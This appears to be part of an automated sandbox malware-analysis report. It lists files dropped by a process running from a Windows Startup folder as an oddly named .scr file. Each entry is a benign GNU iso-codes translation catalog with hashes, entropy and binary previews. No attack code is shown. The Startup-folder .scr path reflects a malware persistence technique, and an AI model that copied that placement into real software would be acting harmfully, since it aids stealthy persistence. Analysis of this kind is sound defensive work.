                                                                                                    SHA-512:B1EE05985EAA217A249E1AECDBBAD048921362D87C5E40E21F5044142B6BB7E308793B08046CAD88B1947E286E1EB19056E6295683581A468180E97A0EAB5092
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 360 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\321\205\320\260\320\267\321\201\320\272\320\270\320\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18412
                                                                                                    Entropy (8bit):5.02517194774641
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bQvvKBmeBHBs6SjqwetoEA65ArtFMVIhOfFMz7QicuuwtY4+x0C:cvvKV9AHGkcjwt5C
                                                                                                    MD5:E105C9DC891D76E408DE582A1174C264
                                                                                                    SHA1:F698556B4C9DF366E2E602664D6ECE6C6EBF417D
                                                                                                    SHA-256:0518CD78793DF7F099AFF9F27E00E3BF46A6EF436B0DD85B346474E1BFCF37EE
                                                                                                    SHA-512:2CC4DC701EE4B56463E371C245B667FF5B979F4904CDC5FED2CF1EEA8083027C4927004A576389C2A3B77B984201BDAB2F81E4B3313BECC13830D4C87D1BCD1D
                                                                                                    Malicious:false
                                                                                                    Preview:........h.......\...............8.......9.......C.......S.......\.......b.......j.......o.......x...............................................................................................................%.......,.......A.......J.......X.......a.......h.......p.......w.......~........................................................................................................................................ ....... ....... ....... ......" ......* ......2 ......; ......D ......L ......U ......^ ......f ......n ......} ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......!!......'!......0!......?!......O!......T!......g!......n!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......!"......,"......2"......<"......C"......I"......b"......x"......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\260\320\267\320\270\320\271\321\201\320\272\320\270\320\265 \321\217\320\267\321\213\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9598
                                                                                                    Entropy (8bit):5.157111986645613
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxlM83SE0BfNcagM2kRl4xdwbNCXmk/fDBHx5qmn9Axp7FbjTcR3dlaWDFfRJn:XKE0BfNcafJL/qRjwns
                                                                                                    MD5:718EBB18B91806C2C4EC46B2286BA062
                                                                                                    SHA1:EC81C668F0B0A1EA9CFAD1D90147364C3333F270
                                                                                                    SHA-256:C4F4244E1DF67FEDBDD76F7491550B9194FAA91C5C7A42F97C0FEEFE52EFC8A9
                                                                                                    SHA-512:221FB9B88B19410103F4A0F462F7D371BE213E300947BF9E0B53312079D2CC6D4BA06B922981086ABABF1FD30CC0FD900067E5DE893F1356BCF08E93ADAE581F
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...............................".......!...7...#...Y.......}...........#...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 384 messages, Project-Id-Version: iso_3166-1 'Afuganisita'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21974
                                                                                                    Entropy (8bit):4.986818192704099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xK3pyvsDFs6jQEqCEKEuEWrXpV8BmbjEb8fP4XGCA07uVatGsLC6BI2OVzU9baZV:xK3pNjQQEu3D78IQb8fP4XGCA0nGsLlu
                                                                                                    MD5:F65CA866AF62D31683684A6BE4CF0667
                                                                                                    SHA1:C60107D4F18C70CB5EB192778AFAC3DAA33430B4
                                                                                                    SHA-256:D1D7D4B55D3AFB8F0BAC5329B906F490AC6F9A5CCD70FF08189FCFD27507BA4B
                                                                                                    SHA-512:D5A2AD1DC9306E50BD20D65C21B1C574756A51740F8A76CA9CA123153162EAE5270A849C51103115366235BA45D99813EEF49FC0296B0D92D2B455988BBEF30B
                                                                                                    Malicious:false
                                                                                                    Preview:................................@ ......A ......M ......U ......] ......l ......t ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......&!.......!......6!......=!......C!......K!.. ...R!......s!......{!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......("....../"......>"......W"......\"......b"......h"......y"......."......."......."..,....".......".......#..%....#......0#......=#......H#......P#......U#......\#......k#..%...z#..,....#.."....#..*....#.......$......#$......,$......5$......H$......d$......l$......r$......~$.......$.......$.......$.......$.......$..'....$.......$.......%......3%......R%......p%......u%......}%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......(&....../&......9&......A&......L&......Q&......[&......b&......p&......w&......}&..!....&.......&.......&.......&.......&..0....&....../'......7'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3 messages, Project-Id-Version: iso_3166-3 'Antiye za nederilande'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):560
                                                                                                    Entropy (8bit):5.143941100811469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCATp/2QvKBxjt02Uk/+W/ckI5m5XmBQWi2a:/ATp/85t0UW69I5iXmq
                                                                                                    MD5:9A49E81427E734E32597BA0E21C47CB0
                                                                                                    SHA1:D791595189AFAAFADC9B13FBB25A142B92A71949
                                                                                                    SHA-256:9FC36A2DE61EA6C2BBD43459838AEEBCFE684215FCDFF359E7ABEDD908A615D9
                                                                                                    SHA-512:70CDA4CEE883E10D9FCA64DEC3A80581E9993516026BD8E70C3AD2E502A532189F4DC77215DA3E330A322B4605723D48D7DDDE916A333D17103690E514AF6DEB
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......`.......a.......v...u............................................Netherlands Antilles.Serbia and Montenegro.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-11-01 15:00+0200.Last-Translator: Steve Murphy <murf@e-tools.com>.Language-Team: Kinyarwanda <translation-team-rw@lists.sourceforge.net>.Language: rw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Antiye za nederilande.Seribiya na Montenegoro.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 83 messages, Project-Id-Version: iso_4217 'Afugani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4998
                                                                                                    Entropy (8bit):4.886448229283162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:H7FZ4bzIwztnwnh7v9oi4YE5MmR01tgjKuc10U4DX:SUcwlSd9dR4gjRJLX
                                                                                                    MD5:313EBA3CDF985AD9594CDE71433E5747
                                                                                                    SHA1:E38705562B8E812C75B9370FC67771DDFCEC86C1
                                                                                                    SHA-256:A77695524F29E96A746C7761D1BBBF37EDC705B5CE6523B29E6D31E12A0B50DF
                                                                                                    SHA-512:004E01CB39816431CC86DA1872DD0FECE0CE9596D17E88BEB289F80F48ABEFC9656205B336030505436373A9A4D208C818D0D3B50C7948E0A14343988B3E31D9
                                                                                                    Malicious:false
                                                                                                    Preview:........S...........q...L...............................(.......7.......E.......W.......g.......v...............................................................................................!.......7.......D.......S.......e.......p.......}.......................................................................................................+.......8.......E.......Q.......a.......q...............................................................................................................A.......R.......b.......q.......{...............................................................................................&.......4.......@.......M.......h.......w...........................s...................'.......=.......Q.......g...............................................................................1.......F.......Y.......k.......x.......................................................................1.......D.......X.......s.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 329 messages, Project-Id-Version: iso_639-3 'Abukaziyani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14237
                                                                                                    Entropy (8bit):4.704850835080162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:x+iD5Wi4QsVKejMqLxMQOuFhY/3FMrL98kF6fB+lhPV:37kVMwOf5Q
                                                                                                    MD5:15AB52F62EFC610DC73D8A0DBA5E953A
                                                                                                    SHA1:1CE347B46C5CA268470ABC2B90D3926E0C46FDBE
                                                                                                    SHA-256:B72EDD502559B6A8618A95640BC1457E36C1A5715B8F0651353E2452B06982DE
                                                                                                    SHA-512:8ED7BFC042A5207C350743A45424265A069FBF1253EC47665177343762633E1476E473C85054020461A312664C19D287FC109B3C2F000D1C45B6CC14E6B83D24
                                                                                                    Malicious:false
                                                                                                    Preview:........I.......d............................................................................................................................................................................... .......(......./.......6.......B.......K.......S.......[.......c.......j.......o.......z...............................................................................................................................................................................&.......5.......?.......G.......O.......V.......^.......g.......l.......r.......{.......................................................................................................................................................".......+......./.......6.......<.......D.......K.......S.......W.......^.......g.......m.......p.......v.......{...............................................................................................................................................&.......,.......4.......:.......D.......I.......N.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10473
                                                                                                    Entropy (8bit):5.09871265434849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dVw6xZacWh28ltU4WjV9qWxa5hW8zLdpa+kY4B9LfhV:7/xZ4hXg4WjVDxa5hW8zLdY+knzhV
                                                                                                    MD5:266C97A2DAC0555DB8091D26F33D0070
                                                                                                    SHA1:498BCF24A33D647F98AC35220F9AA16487FA5754
                                                                                                    SHA-256:A6E12AE62307D034B2FCFA0F7F3A66D4C265C6009248AFFA2CB5F7F8FED878B7
                                                                                                    SHA-512:84F88134BA2ADE99295FACC69878B73D2859D694F632F37AFDF0A1572F1DEA9AB8C565E8A5A9B92A8A0E996253D3C737AF70851D0424BC808CCF7C4342072F76
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afgh\303\240nistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24430
                                                                                                    Entropy (8bit):5.065442674899881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosbM/aCjjamV46nbjz5wsWP48WAINiZGdTca9mUpkBAKjMqNDmmSc:0oNaqa248fmsWP48WAIMOmUWAKjJRz
                                                                                                    MD5:869C936B43179BA6307219435DEDFF41
                                                                                                    SHA1:DDC068EFA1C0CE3CE3995A3C0384F2833079178D
                                                                                                    SHA-256:6BEE4DB0FF77389CC0A2671732E8409A6505386CFD3F2297A0C84162D1ECB58C
                                                                                                    SHA-512:D04A72B9D0954A960B4FBE8D8DC9B69CAB21B8C153D5C3C9A2C17D5CBCCD694B62E2A623C318D5F24B09D91CD7E88A315787153ECF8BDF06FF8D8D0D31B78535
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2282 messages, Project-Id-Version: iso_3166-2 'Aakk\303\242r'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99178
                                                                                                    Entropy (8bit):5.149426548988246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:9SdbbVmhYemGDFEB2CNtjqhj0G+mLlQ0zXepBFtOvXPq:8d4hlmGDnbhjl+weHFsvXS
                                                                                                    MD5:3F3BF54250DD2954D7520ADE6FC21817
                                                                                                    SHA1:753E5F03ACA6DE996543CF25799290D22594A209
                                                                                                    SHA-256:2352BD27125656B76AA97662C3CF08370D1993E7ABF546DF213B5C82282DE725
                                                                                                    SHA-512:6D89F72B315F9F827965A2F48A9E95A285C04BAE23E7B4C35C2BA5B0D33C9F0960FBC487B8A2872B30FF69495E260584122DE4AF53124826070685F031D852F9
                                                                                                    Malicious:false
                                                                                                    Preview:................lG..............`.......a.......i.......p.......~...........................................................................................................................................+.......2.......8.......B.......N.......^.......i.......u............................................................................................................&.......0.......:.......I.......W.......g.......s.......~.......................................................................................................................%.......2.......C.......J.......S.......b.......i.......t.......................................................................................................#......./.......9.......@.......N.......e.......{.......................................................................................................................................#.......).......3.......A.......R.......a.......o.......w.......~.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territ\303\262riu Brit\303\240nnicu Ant\303\240rticu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2948
                                                                                                    Entropy (8bit):5.221474931900516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3Qfh+CRRgBF+vGqIfdvqN5CoU/5g7CbY5jy0SDGK0cBrul/:rLvQ7QBF+yaCokg2wZ+GrY6/
                                                                                                    MD5:99D89B625D5A2CFD70990D552EA29DAB
                                                                                                    SHA1:D1DB3725DDFB8903E10FBA7E16F1089250CFDD3A
                                                                                                    SHA-256:E3D27E29529FEAE3B51A43755C395ADA17CD567F06FD6BDF9C4FB7C8B486F5BD
                                                                                                    SHA-512:C485196BD576B84A51920BF8EE04748E46BC8306D3B35866C7795C007E1BB8892D808A4E5689B70528FD64743A1C37E56B814A1D5191842E2692868D00616168
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................".......0.......-...........D...6...`.........................................../...................N.......g.......w...........................G...................................5...5...J...8...............&...............-.......4...7.......l........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'Unidade de contu de sa ADB'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9999
                                                                                                    Entropy (8bit):4.9654941015875345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFBDwKbVYR6VRyK0G/2LCntxKLhyyUA6bdzmNRyo:SXjbc6TL0G/Uo/3yfedzmWo
                                                                                                    MD5:8D44539A0009E94D96B743B4E1CFD3CC
                                                                                                    SHA1:89B39F508248D23D6732B4B017F8676795E35F3F
                                                                                                    SHA-256:9FD772F8BE312CF314A0AE131C28B8D368C80707D489C8B102A85CA29D486532
                                                                                                    SHA-512:7281CA225DA2F10516E4420BF7F5286884A2D0ECD68AC2C3B4C598F2AE05BDA644A3E6E034B9E2D6E2880F7EA80769B0B408F354E8310B6834724B52543FA15F
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 480 messages, Project-Id-Version: iso_639-3 'Abau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19985
                                                                                                    Entropy (8bit):4.8184321738674285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:J+5llNi3tCcGnO7cBkrlUbQ5TgH/5l6sTO9f4g+UFMBjMUb5fgGL9Eiva91dTsK:Al7cGK6ITQz6T9/2b+GJkdTsK
                                                                                                    MD5:27F7C46285EDD138C0014566B1580094
                                                                                                    SHA1:E7F40B04522C8B4343D4B777D78DCD6996B4F0AB
                                                                                                    SHA-256:839CA810B9B8839951119F955BB743E3982BFA544126733BFD512131BFE37408
                                                                                                    SHA-512:67A85D734661CBED29894FDD8C8EFF527D13831FE5EF345904932E3D74D676B45D4EDF0FC33EDDC9EC50DD2BA36FE148F9324BE20750BF872697E988D055BF0B
                                                                                                    Malicious:false
                                                                                                    Preview:................................ (......!(......&(......0(......=(......F(......L(......T(......[(......a(......f(......o(......y(......~(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......).......).......)......8)......A)......I)......W)......^)......s)......w).......).......).......).......).......).......).......).......).......).......).......).......).......).......*.......*.......*.......*...... *......'*......-*......6*......=*......H*......P*......Y*......_*......g*......s*......{*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......*.......+.......+.......+.......+......$+......-+......;+......C+......I+......Q+......`+......h+......q+......y+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......+.......,.......,.......,.......,.......,......!,......?,......E,......N,......^,......c,......v,......},.......,......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Limbas afroasi\303\240ticas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7679
                                                                                                    Entropy (8bit):4.833270107618133
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDx0TDuwQFSE0BfNca7sPX7msg+gKsOcyguGqq:XWJE0BfNcauCsg+gKfcyFGqq
                                                                                                    MD5:9D1F8411AF9FBA5D48A153F79892A310
                                                                                                    SHA1:D650F267A00E1945C03F312B3F198E1651F15A65
                                                                                                    SHA-256:C59C0D9ED193BDDB8C7075F02726FF8FFD1B4264043472FA8FA57D464CF90B4A
                                                                                                    SHA-512:94DE7F984C34766FC6FB520320AC1EB23386AD555D79661244054B8840C7402AA130E805B415DC59BC8866D2673E6EF84E1D0EF633CF9C79EE92FB392B1A94E7
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3785
                                                                                                    Entropy (8bit):5.035660833922863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mpziiuDqs8/aWkiaU9uEVG7ynpwyPzkIrDQm+aCYbUY2:mpkDqwWkiaU9fVGGXPobaFx2
                                                                                                    MD5:D24A94E14B3F76FBC1134EA342F61696
                                                                                                    SHA1:327AC4D10F18D33E44881DB0CE51A444B6A119DB
                                                                                                    SHA-256:5776D8221B63B0171C50A4796F743A2B371E0BE57D6414854C90D7A80101D407
                                                                                                    SHA-512:1298F8188C24909960594A2996EA69BAC51969523A256EC955C6269C19784110BFBA1CA774F264283A403D889BD51BC7D2AE773A10AE11548732664CBB6A092E
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q.......}.......................................................................................................................................................................#.......+.......2.......8.......@.......F.......M.......T.......Z.......`.......j.......o.......v.......|.......................................................................................................................................................#.......).......6.......>.......H.......P.......].......c.......m.......t.......................................................................................................................................................).......4.......E.......R.......[.......h.......u.......................................................................................................................".......-.......8.......A.......J.......].......f.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3 messages, Project-Id-Version: iso_15924 '\340\266\205\340\266\273\340\267\217\340\266\266\340\267\222'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):600
                                                                                                    Entropy (8bit):5.427280401238537
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iCAFU7BxCfVt02UkM/vETlG/43H3vXmBQWiOWSD:/AFUVCVt0UgveG/yXmGSD
                                                                                                    MD5:C448AA7D09C298DFA6615ABC7E6AA606
                                                                                                    SHA1:46A3629290B977FE7A9B19C47612F47901389E65
                                                                                                    SHA-256:AFC38C018A0352464857CB8B42AB25DEFE8E388ABFA978237AA92501A18F8159
                                                                                                    SHA-512:525BEF932BDADEC26C6582846F69F875E0237DEE380687634DC11983D83EBB1F6F75925CAF4ADB5778639964C1F5F895D1D227F42B72E9E74845A02F8E7E16DF
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......`.......a.......h.......o.......5.......E........................Arabic.Telugu.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-02-28 22:50+0000.Last-Translator: HelaBasa <R45XvezA@protonmail.ch>.Language-Team: Sinhala <https://hosted.weblate.org/projects/iso-codes/iso-15924/si/>.Language: si.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.5...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 '\340\266\207\340\267\206\340\267\212\340\266\234\340\266\261\340\267\222\340\267\203\340\267\212\340\266\255\340\267\217\340\266\261\340\266\272'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):31931
                                                                                                    Entropy (8bit):5.06764523057811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:3nOHasRgW+msOP4XJOAEdBSZzTzlNxIzf/STMn9Yg1RsNgy+F3Xa/0vI1CF:3nOHjmW/+T22IRha/0/F
                                                                                                    MD5:57883CEA7D734711A969E6514E3561FB
                                                                                                    SHA1:011887F93A9D3EB19F0229AE7B95A0246898C608
                                                                                                    SHA-256:315CAD05C8992CF88583503C85D663AD4520C9AB10866EF004D7B8E108398BE9
                                                                                                    SHA-512:B785F9BA7D7328F3579785D63921C1FF3375DD0749CC76519C68AB89BAAA8BE304AD5F855CF730052393FA8BF56A444848FEF4A241562699E9BDD1BDD37C1AED
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\266\266\340\267\212\342\200\215\340\266\273\340\267\222\340\266\255\340\267\217\340\266\261\340\267\212\342\200\215\340\266\272 \340\266\207\340\266\261\340\267\212\340\266\247\340\267\217\340\266\232\340\267\212\340\266\247\340\267\222\340\266\232\340\267\212 \340\266\264\340\267\212\342\200\215\340\266\273\340\266\257\340\267\232\340\267\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3816
                                                                                                    Entropy (8bit):5.3027237746425415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDNUVyBoOHZG+XDDD4GciVcf4Blh3UCRZim:qDNqO5LXc9MceRUcB
                                                                                                    MD5:780A068C9ED866A0E47DA0CBE59BDED0
                                                                                                    SHA1:4C23A9E979C9C888B79AD23A5B83A0BBBFA549F0
                                                                                                    SHA-256:CECBEB95F79E83F19756E488D328598F79D8C029E7AAC6017FFE46A64CFA45CE
                                                                                                    SHA-512:0C80841F4AE6677ABD63F801A69694D874F3D424961E7521D12BB2413EAB8C545ADFDA79D7BC8DC648EDD2F3434C34586BD33AE73D7B64B449D82DFC8D3CA70B
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................Y...L...8.......g.......B...G...................5.......+...S...A.......9.......a.......V...]...<.......+.......".......:...@.......{...(.......V......./...*...G...Z...........+.......@.......m...(...,.......\........... .......:................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_15924 'arabsk\303\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1782
                                                                                                    Entropy (8bit):5.041666227178208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rchGqBrcpOSCgJrTYUXlUvKySnQv8VuyAk:CGarcp9kQlIKivpyAk
                                                                                                    MD5:2C8BC8FA8740C7080ABE91C241433CAE
                                                                                                    SHA1:DDD1F8EFE06732B5BEB598319BE4B2E8F2E242B7
                                                                                                    SHA-256:49F837C102D6EE4DF7EE899648FD6C80E93F52D6A832DA1703706D5405A61A92
                                                                                                    SHA-512:E7D49043E2CF8D9DC7279BB9F29514475426F518950F2610920C5CE2179752662EED91C1EE5E451C606605BD126E8E56C05F2F7460E494A976FF030EB3CF4C56
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................................5.......>.......m.......v...................................................................................]...........Q.......Z.......d.......m.......x.................................................................................../...........@...#...I.......m.......w........................................................................................................................................................................................................................................Arabic.Armenian.Bopomofo.Brahmi.Braille.Cherokee.Cyrillic.Egyptian demotic.Egyptian hieratic.Egyptian hieroglyphs.Glagolitic.Greek.Hangul (Hang.l, Hangeul).Hebrew.Hiragana.Japanese (alias for Han + Hiragana + Katakana).Katakana.Korean (alias for Hangul + Han).Latin.Linear A.Linear B.Mayan hieroglyphs.Phoenician.Rongorongo.Thaana.Thai.Tibeta
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24190
